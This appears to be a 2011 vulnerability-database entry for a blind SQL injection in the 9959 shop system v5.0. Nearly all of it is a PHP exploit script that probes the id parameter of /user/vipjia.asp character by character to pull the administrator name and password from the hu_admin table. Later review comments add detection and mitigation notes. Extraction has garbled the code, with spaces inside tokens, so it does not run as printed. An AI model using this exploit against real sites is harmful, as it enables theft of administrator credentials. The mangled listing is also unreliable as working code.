9959 shop system v5.0 blind SQL injection vulnerability warning - the black bar safety net

2011-06-03T00:00:00
ID MYHACK58:62201130702
Type myhack58
Reporter 佚名
Modified 2011-06-03T00:00:00

Description

Author: stuffy bean

<? php

// Command-line driver of the proof of concept for the blind SQL injection
// reported against /user/vipjia.asp (the id parameter of action=loads).
// This first statement only prints a banner.
// NOTE(review): the listing was mangled by extraction/translation (stray
// spaces inside tokens such as "$ argv" and "<? php"), so it does not parse
// as printed; read it as a record of the request pattern, not as a tool.
print_r('

+---------------------------------------------------------------------------+

9 9 5 9 shop system v5. 0 Blind SQL injection exploit by mendou

Official website: www.9959shop.com

+---------------------------------------------------------------------------+

');

// Print the usage text and stop when no command-line argument was given.
if ($argc < 2) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$ argv[0].' host id

Example:

php '.$ argv[0].' localhost id

+---------------------------------------------------------------------------+

');

exit;

}

// PHP diagnostics are silenced and the execution time limit is lifted; the
// functions below issue one HTTP request per guess, one after another.
error_reporting(0);

ini_set('max_execution_time', 0);

// Host name from the first argument, placed verbatim into the request URL.
$host = $argv[1];

// Characters tested per position: lowercase a-z and 0-9 only.
$str = "abcdefghijklmnopqrstuvwxyz0123456789";

$strlen =strlen($str);

// Value sent as the id query parameter; the injected condition is appended to it.
$pid = $argv[2];

// The two columns read from the hu_admin table are adminname and password.
// For each one the length is determined first, then the value is printed
// character by character.
$n_len = lenstr(adminname); // length of the adminname value

echo "user length:".$ n_len."\ r\n";

pojie("adminname",$n_len);echo "\r\n";

$p_len = lenstr(password); // length of the password value

echo "password length:".$ p_len."\ r\n";

pojie("password",$p_len);

// Recovers a column value one character at a time and echoes it.
//   $str1 - column name placed inside mid(...) in the injected condition
//   $len  - number of character positions to test
// For every position each character of the global alphabet $str is tried: a
// URL-encoded "and (select top 1 mid(column, position, 1) from hu_admin)='c'"
// condition is appended to the id parameter and the page is fetched.
// Detection: this yields up to strlen($str) near-identical requests per
// position to /user/vipjia.asp whose id value carries
// "and (select top 1 ... from hu_admin)"; such bursts stand out in web server
// access logs.
// Mitigation (server side, not shown on this page): the endpoint presumably
// concatenates id into its SQL text - TODO confirm against the ASP source;
// validating id as an integer and binding it as a query parameter removes
// the true/false signal this loop depends on.
function pojie($str1,$len){

global $host,$strlen,$str,$pid;

for ($j=1 ; $j<=$len ; $j++){

for ($i=0 ; $i<$strlen ; $i++){

$exp = "%20and%2 0(select%20top%2 0 1%20mid(".$ str1.",".$ J.", 1)%20from%20hu_admin)='".$ str[$i]."'";

$a = file_get_contents('http://'.$ host.'/ user/vipjia. asp? action=loads&id='.$ pid.$ exp);

// A response containing the text "times" (at a non-zero offset) is taken to
// mean the appended condition was true: the character is printed and the
// next position is started.
if (strpos($a,"times")==true){

echo $str[$i];break;

}

}

}

}

// Determines the length of the user name or password value.
//   $str - column name placed inside len(...) in the injected condition
// Candidate lengths are tried in ascending order (the upper bound is printed
// as "3 0", presumably 30): a URL-encoded
// "and (select top 1 len(column) from hu_admin)=N" condition is appended to
// the id parameter of /user/vipjia.asp and the page is fetched.
// Returns the first N whose response contains "times"; when no candidate
// matches, the function ends without a return statement, so the caller
// receives null.

function lenstr($str){

global $host,$pid;

for ($i=1 ; $i <= 3 0; $i++){

$exp = "%20and%2 0(select%20top%2 0 1%20len(".$ str.")% 20from%20hu_admin)=".$ i;

$a = file_get_contents('http://'.$ host.'/ user/vipjia. asp? action=loads&id='.$ pid.$ exp);

// Same true/false signal as in pojie(): "times" in the response body.
if (strpos($a,"times")==true){

return $i;

}

}

}

?& gt;